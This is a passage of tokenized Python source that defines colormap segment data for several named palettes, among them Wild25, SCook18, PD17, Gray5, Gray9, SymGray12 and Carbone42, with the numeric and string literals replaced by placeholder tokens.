: [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( 
<NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Wild25_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , 
<NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> 
( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) ] <EOL> } <EOL> _SCook18_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , 
<NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , 
<NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _PD17_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , 
<EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Gray5_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Gray9_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' 
: [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _SymGray12_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( 
<NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT> ) ] <EOL> } <EOL> _Carbone42_data = { <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , 
<NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) ] , <EOL> '<STR_LIT>' : [ <EOL> ( <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <EOL> 